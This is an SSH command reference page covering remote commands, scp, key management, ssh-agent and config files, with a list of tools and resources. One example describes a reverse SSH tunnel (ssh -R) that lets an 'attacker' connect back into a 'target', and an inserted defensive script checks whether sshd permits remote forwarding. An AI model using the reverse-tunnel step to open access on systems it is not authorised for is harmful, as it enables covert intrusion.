SSH
Secure Shell
Commands Reference
Remote Ops
ssh “secure shell”
options
-R enables remote port forwarding
[example]
Run command ps on the remote machine myserver.
ssh myserver ps
ssh username@myserver ps # specify user name
ssh -l username myserver ps # specify user name
ssh -p 22 myserver ps # specify port number
ssh myserver ps > /tmp/ps.out # redirect the output to a file on your local system
ssh myserver ps \> /tmp/ps.out # redirect the output to a file on the remote system
[example]
Run a script remotely.
ssh myserver bash < ./myscript.sh
[example]
test version with leading echo
for node in web-server{00..09}; do
echo ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
ready version
for node in web-server{00..09}; do
ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
[example]
wait for a reboot
until ssh user@10.10.10.10; do sleep 3; done
[example]
reverse SSH connection
12345 is the port number that the remote system (the attacker) will use to SSH back into the target
localhost:22 specifies the port number that the target system will listen on to receive a connection
ssh -R 12345:localhost:22 user@remoteipaddress
ssh localhost -p 12345 # set up a reverse connection from the attacker system after the target has connected
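A defender's check for the reverse connection above, as an added example that is not part of the original page: it reads settings in the "keyword value" format that sshd -T prints and reports whether the server would honour ssh -R and where the forwarded port would bind. The function name check_remote_forwarding and the sample inputs are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original page).
# Input: effective sshd settings, one "keyword value" pair per line,
# as printed by `sshd -T`. Output: one verdict line.
# check_remote_forwarding is a hypothetical helper name.

check_remote_forwarding() {
    _cfg=$1
    # Take the first occurrence of each keyword, case-insensitively.
    _fwd=$(printf '%s\n' "$_cfg" |
        awk 'tolower($1)=="allowtcpforwarding"{print tolower($2); exit}')
    _gw=$(printf '%s\n' "$_cfg" |
        awk 'tolower($1)=="gatewayports"{print tolower($2); exit}')
    # OpenSSH defaults apply when a keyword is absent.
    _fwd=${_fwd:-yes}
    _gw=${_gw:-no}

    case "$_fwd" in
        yes|all|remote) ;;   # a request such as -R 12345:localhost:22 is honoured
        *) echo "remote-forwarding=denied"; return 0 ;;
    esac
    case "$_gw" in
        no)              echo "remote-forwarding=allowed bind=loopback" ;;
        clientspecified) echo "remote-forwarding=allowed bind=client-chosen" ;;
        *)               echo "remote-forwarding=allowed bind=all-interfaces" ;;
    esac
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_DEFAULT='port 22
allowtcpforwarding yes
gatewayports no'

SAMPLE_HARDENED='port 22
allowtcpforwarding local
gatewayports no'

SAMPLE_EXPOSED='port 22
allowtcpforwarding remote
gatewayports yes'

# Stand-alone run: print a verdict for each constructed sample.
for _s in "$SAMPLE_DEFAULT" "$SAMPLE_HARDENED" "$SAMPLE_EXPOSED"; do
    check_remote_forwarding "$_s"
done
```

On a live host, pass the output of sshd -T (run as root) as the argument; settings inside Match blocks only show up when a connection spec is given with -C.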
scp “secure copy”
[example]
Upload the file some_system.tar.gz to the home directory of user bob on remote system 10.0.0.45.
scp some_system.tar.gz bob@10.0.0.45:/home/bob/some_system.tar.gz
sftp “secure file transfer protocol”
Key Management
ssh-add
ssh-add --apple-use-keychain ~/.ssh/id_ed25519
ssh-add -l # list private keys currently accessible to ssh-agent
ssh-keysign
ssh-keyscan
ssh-keygen
ssh-keygen -f ~/.ssh/id_ed25519 -t ed25519 -C "email@example.com"
Service
sshd
sftp-server
ssh-agent
eval "$(ssh-agent -s)"
echo $SSH_AGENT_PID
echo $SSH_AUTH_SOCK
ssh-copy-id
ssh-copy-id -i ~/.ssh/id_ed25519 user@host
OpenSSH Files
~/.ssh/authorized_keys
~/.ssh/known_hosts
~/.ssh/config
Host github.com
    AddKeysToAgent yes
    Hostname github.com
    IdentityAgent
    IdentityFile ~/.ssh/id_ed25519
    UseKeychain yes
    User git
Resources
Tools
clusterssh - Written in Perl, it opens a bunch of unmanaged terminals in windows.
mssh (MultiSSH) - GTK+–based multi-SSH client in a single GUI window.
mussh - MUltihost SSH Wrapper shell script.
pconsole - Intended for tiling window managers, spawns a terminal per host.
multixterm - Written in Expect & Tk, drives multiple xterms.
PAC Manager - A Perl SecureCRT-like GUI on Linux.
More
YouTube
Akamai Developer
[ y ] 02-23-2022. “How to use Multiple SSH Keys | Managing Different SSH Keys on your System”.
[ y ] 10-27-2021. “SSH Key Authentication | How to Create SSH Key Pairs”.
LearnLinuxTV
[ y ] 02-07-2023. “Linux Crash Course - Connecting to Linux Servers via SSH”.
[ y ] 11-14-2022. “5 Must Have Tweaks to Secure OpenSSH”.
[ y ] 03-23-2022. “Speed Up Your SSH Sessions with These Seven Quick SSH Config Tricks”.
[ y ] 01-10-2022. “Getting Started with OpenSSH Key Management”.
[ y ] 11-18-2021. “The OpenSSH Client Config File: Simplify your SSH Connections”.
[ y ] 12-18-2020. “SSH Full Course - EVERYTHING You Need to Know!”. https://www.youtube.com/watch?v=YS5Zh7KExvE
[ y ] 10-21-2019. “Linux Commands for Beginners 22 - Remote Management with OpenSSH”.
Low Level Learning
[ y ] 07-03-2024. “new SSH exploit is absolutely wild”.
[ y ] 04-03-2024. “revealing the features of the XZ backdoor”.
More
[ y ] 01-31-2019. Computerphile. “How Secure Shell Works (SSH) - Computerphile”.
[ y ] 03-03-2024. Lawrence Systems. “Linux Supply Chain Attack Discovered in SSH CVE-2024-3094”.
[ y ] 03-11-2020. PowerCert Animated Videos. “Telnet vs SSH Explained”.
[ y ] 07-08-2018. Traversy Media. “SSH Crash Course | With Some DevOps”.
Texts
[ h ] Barrett, Daniel J.; Richard E. Silverman; & Robert G. Byrnes. (2005). SSH The Secure Shell: The Definitive Guide. 2nd Ed. O’Reilly.
Terms
[ w ] Host Key (authenticates computer)
[ w ] Identity Key (authenticates user)
[ w ] OpenSSH
[ w ] PuTTY
[ w ] SFTP Secure File Transfer Protocol
[ w ] SSH Secure Shell
[ w ] SSH Client
[ w ] SSH Server
[ w ] Telnet